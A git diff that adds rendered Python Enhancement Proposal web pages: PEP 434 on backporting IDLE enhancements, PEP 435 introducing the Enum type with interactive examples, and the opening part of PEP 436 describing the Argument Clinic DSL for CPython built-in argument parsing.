+ + + + + \ No newline at end of file diff --git a/pep-0434/index.html b/pep-0434/index.html new file mode 100644 index 00000000000..1fa5f3bfbd2 --- /dev/null +++ b/pep-0434/index.html @@ -0,0 +1,309 @@ + + + + + + + + PEP 434 – IDLE Enhancement Exception for All Branches | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 434 – IDLE Enhancement Exception for All Branches

+
+
Author:
+
Todd Rovito <rovitotv at gmail.com>, +Terry Reedy <tjreedy at udel.edu>
+
BDFL-Delegate:
+
Alyssa Coghlan
+
Status:
+
Active
+
Type:
+
Informational
+
Created:
+
16-Feb-2013
+
Post-History:
+
16-Feb-2013, +03-Mar-2013, +21-Mar-2013, +30-Mar-2013
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Most CPython tracker issues are classified as behavior or enhancement. +Most behavior patches are backported to branches for existing +versions. Enhancement patches are restricted to the default branch +that becomes the next Python version.

+

This PEP proposes that the restriction on applying enhancements be +relaxed for IDLE code, residing in …/Lib/idlelib/. In practice, +this would mean that IDLE developers would not have to classify or +agree on the classification of a patch but could instead focus on what +is best for IDLE users and future IDLE development. It would also +mean that IDLE patches would not necessarily have to be split into +‘bugfix’ changes and enhancement changes.

+

The PEP would apply to changes in existing features and addition of +small features, such as would require a new menu entry, but not +necessarily to possible major re-writes such as switching to themed +widgets or tabbed windows.

+
+
+

Motivation

+

This PEP was prompted by controversy on both the tracker and pydev +list over adding Cut, Copy, and Paste to right-click context menus +(Issue 1207589, opened in 2005 [1]; pydev thread [2]). The features +were available as keyboard shortcuts but not on the context menu. It +is standard, at least on Windows, that they should be when applicable +(a read-only window would only have Copy), so users do not have to +shift to the keyboard after selecting text for cutting or copying or a +slice point for pasting. The context menu was not documented until 10 +days before the new options were added (Issue 10405 [5]).

+

Normally, behavior is called a bug if it conflicts with documentation +judged to be correct. But if there is no doc, what is the standard? +If the code is its own documentation, most IDLE issues on the tracker +are enhancement issues. If we substitute reasonable user expectation, +(which can, of course, be its own subject of disagreement), many more +issues are behavior issues.

+

For context menus, people disagreed on the status of the additions – +bugfix or enhancement. Even people who called it an enhancement +disagreed as to whether the patch should be backported. This PEP +proposes to make the status disagreement irrelevant by explicitly +allowing more liberal backporting than for other stdlib modules.

+

Python does have many advanced features yet Python is well known for +being an easy computer language for beginners [3]. A major Python +philosophy is “batteries included” which is best demonstrated in +Python’s standard library with many modules that are not typically +included with other programming languages [4]. IDLE is an important +“battery” in the Python toolbox because it allows a beginner to get +started quickly without downloading and configuring a third party IDE. +IDLE represents a commitment by the Python community to encouage the +use of Python as a teaching language both inside and outside of formal +educational settings. The recommended teaching experience is to have +a learner start with IDLE. This PEP and the work that it will enable +will allow the Python community to make that learner’s experience with +IDLE awesome by making IDLE a simple tool for beginners to get started +with Python.

+
+
+

Rationale

+

People primarily use IDLE by running the graphical user interface +(GUI) application, rather than by directly importing the effectively +private (undocumented) implementation modules in idlelib. Whether +they use the shell, the editor, or both, we believe they will benefit +more from consistency across the latest releases of current Python +versions than from consistency within the bugfix releases for one +Python version. This is especially true when existing behavior is +clearly unsatisfactory.

+

When people use the standard interpreter, the OS-provided frame works +the same for all Python versions. If, for instance, Microsoft were to +upgrade the Command Prompt GUI, the improvements would be present +regardless of which Python were running within it. Similarly, if one +edits Python code with editor X, behaviors such as the right-click +context menu and the search-replace box do not depend on the version +of Python being edited or even the language being edited.

+

The benefit for IDLE developers is mixed. On the one hand, testing +more versions and possibly having to adjust a patch, especially for +2.7, is more work. (There is, of course, the option on not +backporting everything. For issue 12510, some changes to calltips for +classes were not included in the 2.7 patch because of issues with +old-style classes [6].) On the other hand, bike-shedding can be an +energy drain. If the obvious fix for a bug looks like an enhancement, +writing a separate bugfix-only patch is more work. And making the +code diverge between versions makes future multi-version patches more +difficult.

+

These issue are illustrated by the search-and-replace dialog box. It +used to raise an exception for certain user entries [7]. The +uncaught exception caused IDLE to exit. At least on Windows, the exit +was silent (no visible traceback) and looked like a crash if IDLE was +started normally, from an icon.

+

Was this a bug? IDLE Help (on the current Help submenu) just says +“Replace… Open a search-and-replace dialog box”, and a box was +opened. It is not, in general, a bug for a library method to raise an +exception. And it is not, in general, a bug for a library method to +ignore an exception raised by functions it calls. So if we were to +adopt the ‘code = doc’ philosophy in the absence of detailed docs, one +might say ‘No’.

+

However, IDLE exiting when it does not need to is definitely +obnoxious. So four of us agreed that it should be prevented. But +there was still the question of what to do instead? Catch the +exception? Just not raise the exception? Beep? Display an error +message box? Or try to do something useful with the user’s entry? +Would replacing a ‘crash’ with useful behavior be an enhancement, +limited to future Python releases? Should IDLE developers have to ask +that?

+
+
+

Backwards Compatibility

+

For IDLE, there are three types of users who might be concerned about +back compatibility. First are people who run IDLE as an application. +We have already discussed them above.

+

Second are people who import one of the idlelib modules. As far as we +know, this is only done to start the IDLE application, and we do not +propose breaking such use. Otherwise, the modules are undocumented +and effectively private implementations. If an IDLE module were +defined as public, documented, and perhaps moved to the tkinter +package, it would then follow the normal rules. (Documenting the +private interfaces for the benefit of people working on the IDLE code +is a separate issue.)

+

Third are people who write IDLE extensions. The guaranteed extension +interface is given in idlelib/extension.txt. This should be respected +at least in existing versions, and not frivolously changed in future +versions. But there is a warning that “The extension cannot assume +much about this [EditorWindow] argument.” This guarantee should +rarely be an issue with patches, and the issue is not specific to +‘enhancement’ versus ‘bugfix’ patches.

+

As is happens, after the context menu patch was applied, it came up +that extensions that added items to the context menu (rare) would be +broken because the patch a) added a new item to standard rmenu_specs +and b) expected every rmenu_spec to be lengthened. It is not clear +whether this violates the guarantee, but there is a second patch that +fixes assumption b). It should be applied when it is clear that the +first patch will not have to be reverted.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0434.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0435/index.html b/pep-0435/index.html new file mode 100644 index 00000000000..29c8c1fdc73 --- /dev/null +++ b/pep-0435/index.html @@ -0,0 +1,750 @@ + + + + + + + + PEP 435 – Adding an Enum type to the Python standard library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 435 – Adding an Enum type to the Python standard library

+
+
Author:
+
Barry Warsaw <barry at python.org>, +Eli Bendersky <eliben at gmail.com>, +Ethan Furman <ethan at stoneleaf.us>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
23-Feb-2013
+
Python-Version:
+
3.4
+
Post-History:
+
23-Feb-2013, 02-May-2013
+
Replaces:
+
354
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding an enumeration type to the Python standard library.

+

An enumeration is a set of symbolic names bound to unique, constant values. +Within an enumeration, the values can be compared by identity, and the +enumeration itself can be iterated over.

+
+
+

Status of discussions

+

The idea of adding an enum type to Python is not new - PEP 354 is a +previous attempt that was rejected in 2005. Recently a new set of discussions +was initiated [3] on the python-ideas mailing list. Many new ideas were +proposed in several threads; after a lengthy discussion Guido proposed adding +flufl.enum to the standard library [4]. During the PyCon 2013 language +summit the issue was discussed further. It became clear that many developers +want to see an enum that subclasses int, which can allow us to replace +many integer constants in the standard library by enums with friendly string +representations, without ceding backwards compatibility. An additional +discussion among several interested core developers led to the proposal of +having IntEnum as a special case of Enum.

+

The key dividing issue between Enum and IntEnum is whether comparing +to integers is semantically meaningful. For most uses of enumerations, it’s +a feature to reject comparison to integers; enums that compare to integers +lead, through transitivity, to comparisons between enums of unrelated types, +which isn’t desirable in most cases. For some uses, however, greater +interoperability with integers is desired. For instance, this is the case for +replacing existing standard library constants (such as socket.AF_INET) +with enumerations.

+

Further discussion in late April 2013 led to the conclusion that enumeration +members should belong to the type of their enum: type(Color.red) == Color. +Guido has pronounced a decision on this issue [5], as well as related issues +of not allowing to subclass enums [6], unless they define no enumeration +members [7].

+

The PEP was accepted by Guido on May 10th, 2013 [1].

+
+
+

Motivation

+

[Based partly on the Motivation stated in PEP 354]

+

The properties of an enumeration are useful for defining an immutable, related +set of constant values that may or may not have a semantic meaning. Classic +examples are days of the week (Sunday through Saturday) and school assessment +grades (‘A’ through ‘D’, and ‘F’). Other examples include error status values +and states within a defined process.

+

It is possible to simply define a sequence of values of some other basic type, +such as int or str, to represent discrete arbitrary values. However, +an enumeration ensures that such values are distinct from any others including, +importantly, values within other enumerations, and that operations without +meaning (“Wednesday times two”) are not defined for these values. It also +provides a convenient printable representation of enum values without requiring +tedious repetition while defining them (i.e. no GREEN = 'green').

+
+
+

Module and type name

+

We propose to add a module named enum to the standard library. The main +type exposed by this module is Enum. Hence, to import the Enum type +user code will run:

+
>>> from enum import Enum
+
+
+
+
+

Proposed semantics for the new enumeration type

+
+

Creating an Enum

+

Enumerations are created using the class syntax, which makes them easy to read +and write. An alternative creation method is described in Functional API. +To define an enumeration, subclass Enum as follows:

+
>>> from enum import Enum
+>>> class Color(Enum):
+...     red = 1
+...     green = 2
+...     blue = 3
+
+
+

A note on nomenclature: we call Color an enumeration (or enum) +and Color.red, Color.green are enumeration members (or +enum members). Enumeration members also have values (the value of +Color.red is 1, etc.)

+

Enumeration members have human readable string representations:

+
>>> print(Color.red)
+Color.red
+
+
+

…while their repr has more information:

+
>>> print(repr(Color.red))
+<Color.red: 1>
+
+
+

The type of an enumeration member is the enumeration it belongs to:

+
>>> type(Color.red)
+<Enum 'Color'>
+>>> isinstance(Color.green, Color)
+True
+>>>
+
+
+

Enums also have a property that contains just their item name:

+
>>> print(Color.red.name)
+red
+
+
+

Enumerations support iteration, in definition order:

+
>>> class Shake(Enum):
+...   vanilla = 7
+...   chocolate = 4
+...   cookies = 9
+...   mint = 3
+...
+>>> for shake in Shake:
+...   print(shake)
+...
+Shake.vanilla
+Shake.chocolate
+Shake.cookies
+Shake.mint
+
+
+

Enumeration members are hashable, so they can be used in dictionaries and sets:

+
>>> apples = {}
+>>> apples[Color.red] = 'red delicious'
+>>> apples[Color.green] = 'granny smith'
+>>> apples
+{<Color.red: 1>: 'red delicious', <Color.green: 2>: 'granny smith'}
+
+
+
+
+

Programmatic access to enumeration members

+

Sometimes it’s useful to access members in enumerations programmatically (i.e. +situations where Color.red won’t do because the exact color is not known +at program-writing time). Enum allows such access:

+
>>> Color(1)
+<Color.red: 1>
+>>> Color(3)
+<Color.blue: 3>
+
+
+

If you want to access enum members by name, use item access:

+
>>> Color['red']
+<Color.red: 1>
+>>> Color['green']
+<Color.green: 2>
+
+
+
+
+

Duplicating enum members and values

+

Having two enum members with the same name is invalid:

+
>>> class Shape(Enum):
+...   square = 2
+...   square = 3
+...
+Traceback (most recent call last):
+...
+TypeError: Attempted to reuse key: square
+
+
+

However, two enum members are allowed to have the same value. Given two members +A and B with the same value (and A defined first), B is an alias to A. By-value +lookup of the value of A and B will return A. By-name lookup of B will also +return A:

+
>>> class Shape(Enum):
+...   square = 2
+...   diamond = 1
+...   circle = 3
+...   alias_for_square = 2
+...
+>>> Shape.square
+<Shape.square: 2>
+>>> Shape.alias_for_square
+<Shape.square: 2>
+>>> Shape(2)
+<Shape.square: 2>
+
+
+

Iterating over the members of an enum does not provide the aliases:

+
>>> list(Shape)
+[<Shape.square: 2>, <Shape.diamond: 1>, <Shape.circle: 3>]
+
+
+

The special attribute __members__ is an ordered dictionary mapping names +to members. It includes all names defined in the enumeration, including the +aliases:

+
>>> for name, member in Shape.__members__.items():
+...   name, member
+...
+('square', <Shape.square: 2>)
+('diamond', <Shape.diamond: 1>)
+('circle', <Shape.circle: 3>)
+('alias_for_square', <Shape.square: 2>)
+
+
+

The __members__ attribute can be used for detailed programmatic access to +the enumeration members. For example, finding all the aliases:

+
>>> [name for name, member in Shape.__members__.items() if member.name != name]
+['alias_for_square']
+
+
+
+
+

Comparisons

+

Enumeration members are compared by identity:

+
>>> Color.red is Color.red
+True
+>>> Color.red is Color.blue
+False
+>>> Color.red is not Color.blue
+True
+
+
+

Ordered comparisons between enumeration values are not supported. Enums are +not integers (but see IntEnum below):

+
>>> Color.red < Color.blue
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: unorderable types: Color() < Color()
+
+
+

Equality comparisons are defined though:

+
>>> Color.blue == Color.red
+False
+>>> Color.blue != Color.red
+True
+>>> Color.blue == Color.blue
+True
+
+
+

Comparisons against non-enumeration values will always compare not equal +(again, IntEnum was explicitly designed to behave differently, see +below):

+
>>> Color.blue == 2
+False
+
+
+
+
+

Allowed members and attributes of enumerations

+

The examples above use integers for enumeration values. Using integers is +short and handy (and provided by default by the Functional API), but not +strictly enforced. In the vast majority of use-cases, one doesn’t care what +the actual value of an enumeration is. But if the value is important, +enumerations can have arbitrary values.

+

Enumerations are Python classes, and can have methods and special methods as +usual. If we have this enumeration:

+
class Mood(Enum):
+  funky = 1
+  happy = 3
+
+  def describe(self):
+    # self is the member here
+    return self.name, self.value
+
+  def __str__(self):
+    return 'my custom str! {0}'.format(self.value)
+
+  @classmethod
+  def favorite_mood(cls):
+    # cls here is the enumeration
+    return cls.happy
+
+
+

Then:

+
>>> Mood.favorite_mood()
+<Mood.happy: 3>
+>>> Mood.happy.describe()
+('happy', 3)
+>>> str(Mood.funky)
+'my custom str! 1'
+
+
+

The rules for what is allowed are as follows: all attributes defined within an +enumeration will become members of this enumeration, with the exception of +__dunder__ names and descriptors [9]; methods are descriptors too.

+
+
+

Restricted subclassing of enumerations

+

Subclassing an enumeration is allowed only if the enumeration does not define +any members. So this is forbidden:

+
>>> class MoreColor(Color):
+...   pink = 17
+...
+TypeError: Cannot extend enumerations
+
+
+

But this is allowed:

+
>>> class Foo(Enum):
+...   def some_behavior(self):
+...     pass
+...
+>>> class Bar(Foo):
+...   happy = 1
+...   sad = 2
+...
+
+
+

The rationale for this decision was given by Guido in [6]. Allowing to +subclass enums that define members would lead to a violation of some +important invariants of types and instances. On the other hand, it +makes sense to allow sharing some common behavior between a group of +enumerations, and subclassing empty enumerations is also used to implement +IntEnum.

+
+
+

IntEnum

+

A variation of Enum is proposed which is also a subclass of int. +Members of an IntEnum can be compared to integers; by extension, +integer enumerations of different types can also be compared to each other:

+
>>> from enum import IntEnum
+>>> class Shape(IntEnum):
+...   circle = 1
+...   square = 2
+...
+>>> class Request(IntEnum):
+...   post = 1
+...   get = 2
+...
+>>> Shape == 1
+False
+>>> Shape.circle == 1
+True
+>>> Shape.circle == Request.post
+True
+
+
+

However they still can’t be compared to Enum:

+
>>> class Shape(IntEnum):
+...   circle = 1
+...   square = 2
+...
+>>> class Color(Enum):
+...   red = 1
+...   green = 2
+...
+>>> Shape.circle == Color.red
+False
+
+
+

IntEnum values behave like integers in other ways you’d expect:

+
>>> int(Shape.circle)
+1
+>>> ['a', 'b', 'c'][Shape.circle]
+'b'
+>>> [i for i in range(Shape.square)]
+[0, 1]
+
+
+

For the vast majority of code, Enum is strongly recommended, +since IntEnum breaks some semantic promises of an enumeration (by +being comparable to integers, and thus by transitivity to other +unrelated enumerations). It should be used only in special cases where +there’s no other choice; for example, when integer constants are +replaced with enumerations and backwards compatibility is required +with code that still expects integers.

+
+
+

Other derived enumerations

+

IntEnum will be part of the enum module. However, it would be very +simple to implement independently:

+
class IntEnum(int, Enum):
+    pass
+
+
+

This demonstrates how similar derived enumerations can be defined, for example +a StrEnum that mixes in str instead of int.

+

Some rules:

+
    +
  1. When subclassing Enum, mix-in types must appear before Enum itself in the +sequence of bases, as in the IntEnum example above.
  2. +
  3. While Enum can have members of any type, once you mix in an additional +type, all the members must have values of that type, e.g. int above. +This restriction does not apply to mix-ins which only add methods +and don’t specify another data type such as int or str.
  4. +
+
+
+

Pickling

+

Enumerations can be pickled and unpickled:

+
>>> from enum.tests.fruit import Fruit
+>>> from pickle import dumps, loads
+>>> Fruit.tomato is loads(dumps(Fruit.tomato))
+True
+
+
+

The usual restrictions for pickling apply: picklable enums must be defined in +the top level of a module, since unpickling requires them to be importable +from that module.

+
+
+

Functional API

+

The Enum class is callable, providing the following functional API:

+
>>> Animal = Enum('Animal', 'ant bee cat dog')
+>>> Animal
+<Enum 'Animal'>
+>>> Animal.ant
+<Animal.ant: 1>
+>>> Animal.ant.value
+1
+>>> list(Animal)
+[<Animal.ant: 1>, <Animal.bee: 2>, <Animal.cat: 3>, <Animal.dog: 4>]
+
+
+

The semantics of this API resemble namedtuple. The first argument +of the call to Enum is the name of the enumeration. Pickling enums +created with the functional API will work on CPython and PyPy, but for +IronPython and Jython you may need to specify the module name explicitly +as follows:

+
>>> Animals = Enum('Animals', 'ant bee cat dog', module=__name__)
+
+
+

The second argument is the source of enumeration member names. It can be a +whitespace-separated string of names, a sequence of names, a sequence of +2-tuples with key/value pairs, or a mapping (e.g. dictionary) of names to +values. The last two options enable assigning arbitrary values to +enumerations; the others auto-assign increasing integers starting with 1. A +new class derived from Enum is returned. In other words, the above +assignment to Animal is equivalent to:

+
>>> class Animals(Enum):
+...   ant = 1
+...   bee = 2
+...   cat = 3
+...   dog = 4
+
+
+

The reason for defaulting to 1 as the starting number and not 0 is +that 0 is False in a boolean sense, but enum members all evaluate +to True.

+
+
+
+

Proposed variations

+

Some variations were proposed during the discussions in the mailing list. +Here’s some of the more popular ones.

+
+

flufl.enum

+

flufl.enum was the reference implementation upon which this PEP was +originally based. Eventually, it was decided against the inclusion of +flufl.enum because its design separated enumeration members from +enumerations, so the former are not instances of the latter. Its design +also explicitly permits subclassing enumerations for extending them with +more members (due to the member/enum separation, the type invariants are not +violated in flufl.enum with such a scheme).

+
+
+

Not having to specify values for enums

+

Michael Foord proposed (and Tim Delaney provided a proof-of-concept +implementation) to use metaclass magic that makes this possible:

+
class Color(Enum):
+    red, green, blue
+
+
+

The values get actually assigned only when first looked up.

+

Pros: cleaner syntax that requires less typing for a very common task (just +listing enumeration names without caring about the values).

+

Cons: involves much magic in the implementation, which makes even the +definition of such enums baffling when first seen. Besides, explicit is +better than implicit.

+
+
+

Using special names or forms to auto-assign enum values

+

A different approach to avoid specifying enum values is to use a special name +or form to auto assign them. For example:

+
class Color(Enum):
+    red = None          # auto-assigned to 0
+    green = None        # auto-assigned to 1
+    blue = None         # auto-assigned to 2
+
+
+

More flexibly:

+
class Color(Enum):
+    red = 7
+    green = None        # auto-assigned to 8
+    blue = 19
+    purple = None       # auto-assigned to 20
+
+
+

Some variations on this theme:

+
    +
  1. A special name auto imported from the enum package.
  2. +
  3. Georg Brandl proposed ellipsis (...) instead of None to achieve the +same effect.
  4. +
+

Pros: no need to manually enter values. Makes it easier to change the enum and +extend it, especially for large enumerations.

+

Cons: actually longer to type in many simple cases. The argument of explicit +vs. implicit applies here as well.

+
+
+
+

Use-cases in the standard library

+

The Python standard library has many places where the usage of enums would be +beneficial to replace other idioms currently used to represent them. Such +usages can be divided to two categories: user-code facing constants, and +internal constants.

+

User-code facing constants like os.SEEK_*, socket module constants, +decimal rounding modes and HTML error codes could require backwards +compatibility since user code may expect integers. IntEnum as described +above provides the required semantics; being a subclass of int, it does not +affect user code that expects integers, while on the other hand allowing +printable representations for enumeration values:

+
>>> import socket
+>>> family = socket.AF_INET
+>>> family == 2
+True
+>>> print(family)
+SocketFamily.AF_INET
+
+
+

Internal constants are not seen by user code but are employed internally by +stdlib modules. These can be implemented with Enum. Some examples +uncovered by a very partial skim through the stdlib: binhex, imaplib, +http/client, urllib/robotparser, idlelib, concurrent.futures, +turtledemo.

+

In addition, looking at the code of the Twisted library, there are many use +cases for replacing internal state constants with enums. The same can be said +about a lot of networking code (especially implementation of protocols) and +can be seen in test protocols written with the Tulip library as well.

+
+
+

Acknowledgments

+

This PEP was initially proposing including the flufl.enum package [8] +by Barry Warsaw into the stdlib, and is inspired in large parts by it. +Ben Finney is the author of the earlier enumeration PEP 354.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0435.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0436/index.html b/pep-0436/index.html new file mode 100644 index 00000000000..5af656d6952 --- /dev/null +++ b/pep-0436/index.html @@ -0,0 +1,861 @@ + + + + + + + + PEP 436 – The Argument Clinic DSL | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 436 – The Argument Clinic DSL

+
+
Author:
+
Larry Hastings <larry at hastings.org>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
22-Feb-2013
+
Python-Version:
+
3.4
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document proposes “Argument Clinic”, a DSL to facilitate +argument processing for built-in functions in the implementation of +CPython.

+
+
+

Rationale and Goals

+

The primary implementation of Python, “CPython”, is written in a +mixture of Python and C. One implementation detail of CPython +is what are called “built-in” functions – functions available to +Python programs but written in C. When a Python program calls a +built-in function and passes in arguments, those arguments must be +translated from Python values into C values. This process is called +“parsing arguments”.

+

As of CPython 3.3, builtin functions nearly always parse their arguments +with one of two functions: the original PyArg_ParseTuple(), [1] and +the more modern PyArg_ParseTupleAndKeywords(). [2] The former +only handles positional parameters; the latter also accommodates keyword +and keyword-only parameters, and is preferred for new code.

+

With either function, the caller specifies the translation for +parsing arguments in a “format string”: [3] each parameter corresponds +to a “format unit”, a short character sequence telling the parsing +function what Python types to accept and how to translate them into +the appropriate C value for that parameter.

+

PyArg_ParseTuple() was reasonable when it was first conceived. +There were only a dozen or so of these “format units”; each one +was distinct, and easy to understand and remember. +But over the years the PyArg_Parse interface has been extended +in numerous ways. The modern API is complex, to the point that it +is somewhat painful to use. Consider:

+
    +
  • There are now forty different “format units”; a few are even three +characters long. This makes it difficult for the programmer to +understand what the format string says–or even perhaps to parse +it–without constantly cross-indexing it with the documentation.
  • +
  • There are also six meta-format units that may be buried in the +format string. (They are: "()|$:;".)
  • +
  • The more format units are added, the less likely it is the +implementer can pick an easy-to-use mnemonic for the format unit, +because the character of choice is probably already in use. In +other words, the more format units we have, the more obtuse the +format units become.
  • +
  • Several format units are nearly identical to others, having only +subtle differences. This makes understanding the exact semantics +of the format string even harder, and can make it difficult to +figure out exactly which format unit you want.
  • +
  • The docstring is specified as a static C string, making it mildly +bothersome to read and edit since it must obey C string quoting rules.
  • +
  • When adding a new parameter to a function using +PyArg_ParseTupleAndKeywords(), it’s necessary to touch six +different places in the code: [4]
      +
    • Declaring the variable to store the argument.
    • +
    • Passing in a pointer to that variable in the correct spot in +PyArg_ParseTupleAndKeywords(), also passing in any +“length” or “converter” arguments in the correct order.
    • +
    • Adding the name of the argument in the correct spot of the +“keywords” array passed in to +PyArg_ParseTupleAndKeywords().
    • +
    • Adding the format unit to the correct spot in the format +string.
    • +
    • Adding the parameter to the prototype in the docstring.
    • +
    • Documenting the parameter in the docstring.
    • +
    +
  • +
  • There is currently no mechanism for builtin functions to provide +their “signature” information (see inspect.getfullargspec and +inspect.Signature). Adding this information using a mechanism +similar to the existing PyArg_Parse functions would require +repeating ourselves yet again.
  • +
+

The goal of Argument Clinic is to replace this API with a mechanism +inheriting none of these downsides:

+
    +
  • You need specify each parameter only once.
  • +
  • All information about a parameter is kept together in one place.
  • +
  • For each parameter, you specify a conversion function; Argument +Clinic handles the translation from Python value into C value for +you.
  • +
  • Argument Clinic also allows for fine-tuning of argument processing +behavior with parameterized conversion functions.
  • +
  • Docstrings are written in plain text. Function docstrings are +required; per-parameter docstrings are encouraged.
  • +
  • From this, Argument Clinic generates for you all the mundane, +repetitious code and data structures CPython needs internally. +Once you’ve specified the interface, the next step is simply to +write your implementation using native C types. Every detail of +argument parsing is handled for you.
  • +
+

Argument Clinic is implemented as a preprocessor. It draws inspiration +for its workflow directly from [Cog] by Ned Batchelder. To use Clinic, +add a block comment to your C source code beginning and ending with +special text strings, then run Clinic on the file. Clinic will find the +block comment, process the contents, and write the output back into your +C source file directly after the comment. The intent is that Clinic’s +output becomes part of your source code; it’s checked in to revision +control, and distributed with source packages. This means that Python +will still ship ready-to-build. It does complicate development slightly; +in order to add a new function, or modify the arguments or documentation +of an existing function using Clinic, you’ll need a working Python 3 +interpreter.

+

Future goals of Argument Clinic include:

+
    +
  • providing signature information for builtins,
  • +
  • enabling alternative implementations of Python to create +automated library compatibility tests, and
  • +
  • speeding up argument parsing with improvements to the +generated code.
  • +
+
+
+

DSL Syntax Summary

+

The Argument Clinic DSL is specified as a comment embedded in a C +file, as follows. The “Example” column on the right shows you sample +input to the Argument Clinic DSL, and the “Section” column on the left +specifies what each line represents in turn.

+

Argument Clinic’s DSL syntax mirrors the Python def +statement, lending it some familiarity to Python core developers.

+
+-----------------------+-----------------------------------------------------------------+
+| Section               | Example                                                         |
++-----------------------+-----------------------------------------------------------------+
+| Clinic DSL start      | /*[clinic]                                                      |
+| Module declaration    | module module_name                                              |
+| Class declaration     | class module_name.class_name                                    |
+| Function declaration  | module_name.function_name  -> return_annotation                 |
+| Parameter declaration |       name : converter(param=value)                             |
+| Parameter docstring   |           Lorem ipsum dolor sit amet, consectetur               |
+|                       |           adipisicing elit, sed do eiusmod tempor               |
+| Function docstring    | Lorem ipsum dolor sit amet, consectetur adipisicing             |
+|                       | elit, sed do eiusmod tempor incididunt ut labore et             |
+| Clinic DSL end        | [clinic]*/                                                      |
+| Clinic output         | ...                                                             |
+| Clinic output end     | /*[clinic end output:<checksum>]*/                              |
++-----------------------+-----------------------------------------------------------------+
+
+
+

To give some flavor of the proposed DSL syntax, here are some sample Clinic +code blocks. This first block reflects the normally preferred style, including +blank lines between parameters and per-argument docstrings. +It also includes a user-defined converter (path_t) created +locally:

+
/*[clinic]
+os.stat as os_stat_fn -> stat result
+
+   path: path_t(allow_fd=1)
+       Path to be examined; can be string, bytes, or open-file-descriptor int.
+
+   *
+
+   dir_fd: OS_STAT_DIR_FD_CONVERTER = DEFAULT_DIR_FD
+       If not None, it should be a file descriptor open to a directory,
+       and path should be a relative string; path will then be relative to
+       that directory.
+
+   follow_symlinks: bool = True
+       If False, and the last element of the path is a symbolic link,
+       stat will examine the symbolic link itself instead of the file
+       the link points to.
+
+Perform a stat system call on the given path.
+
+{parameters}
+
+dir_fd and follow_symlinks may not be implemented
+  on your platform.  If they are unavailable, using them will raise a
+  NotImplementedError.
+
+It's an error to use dir_fd or follow_symlinks when specifying path as
+  an open file descriptor.
+
+[clinic]*/
+
+
+

This second example shows a minimal Clinic code block, omitting all +parameter docstrings and non-significant blank lines:

+
/*[clinic]
+os.access
+   path: path
+   mode: int
+   *
+   dir_fd: OS_ACCESS_DIR_FD_CONVERTER = 1
+   effective_ids: bool = False
+   follow_symlinks: bool = True
+Use the real uid/gid to test for access to a path.
+Returns True if granted, False otherwise.
+
+{parameters}
+
+dir_fd, effective_ids, and follow_symlinks may not be implemented
+  on your platform.  If they are unavailable, using them will raise a
+  NotImplementedError.
+
+Note that most operations will use the effective uid/gid, therefore this
+  routine can be used in a suid/sgid environment to test if the invoking user
+  has the specified access to the path.
+
+[clinic]*/
+
+
+

This final example shows a Clinic code block handling groups of +optional parameters, including parameters on the left:

+
/*[clinic]
+curses.window.addch
+
+   [
+   y: int
+     Y-coordinate.
+
+   x: int
+     X-coordinate.
+   ]
+
+   ch: char
+     Character to add.
+
+   [
+   attr: long
+     Attributes for the character.
+   ]
+
+   /
+
+Paint character ch at (y, x) with attributes attr,
+overwriting any character previously painter at that location.
+By default, the character position and attributes are the
+current settings for the window object.
+[clinic]*/
+
+
+
+

General Behavior Of the Argument Clinic DSL

+

All lines support # as a line comment delimiter except +docstrings. Blank lines are always ignored.

+

Like Python itself, leading whitespace is significant in the Argument +Clinic DSL. The first line of the “function” section is the +function declaration. Indented lines below the function declaration +declare parameters, one per line; lines below those that are indented even +further are per-parameter docstrings. Finally, the first line dedented +back to column 0 end parameter declarations and start the function docstring.

+

Parameter docstrings are optional; function docstrings are not. +Functions that specify no arguments may simply specify the function +declaration followed by the docstring.

+
+
+

Module and Class Declarations

+

When a C file implements a module or class, this should be declared to +Clinic. The syntax is simple:

+
module module_name
+
+
+

or

+
class module_name.class_name
+
+
+

(Note that these are not actually special syntax; they are implemented +as Directives.)

+

The module name or class name should always be the full dotted path +from the top-level module. Nested modules and classes are supported.

+
+
+

Function Declaration

+

The full form of the function declaration is as follows:

+
dotted.name [ as legal_c_id ] [ -> return_annotation ]
+
+
+

The dotted name should be the full name of the function, starting +with the highest-level package (e.g. “os.stat” or “curses.window.addch”).

+

The “as legal_c_id” syntax is optional. +Argument Clinic uses the name of the function to create the names of +the generated C functions. In some circumstances, the generated name +may collide with other global names in the C program’s namespace. +The “as legal_c_id” syntax allows you to override the generated name +with your own; substitute “legal_c_id” with any legal C identifier. +If skipped, the “as” keyword must also be omitted.

+

The return annotation is also optional. If skipped, the arrow (”->”) +must also be omitted. If specified, the value for the return annotation +must be compatible with ast.literal_eval, and it is interpreted as +a return converter.

+
+
+

Parameter Declaration

+

The full form of the parameter declaration line as follows:

+
name: converter [ (parameter=value [, parameter2=value2]) ] [ = default]
+
+
+

The “name” must be a legal C identifier. Whitespace is permitted between +the name and the colon (though this is not the preferred style). Whitespace +is permitted (and encouraged) between the colon and the converter.

+

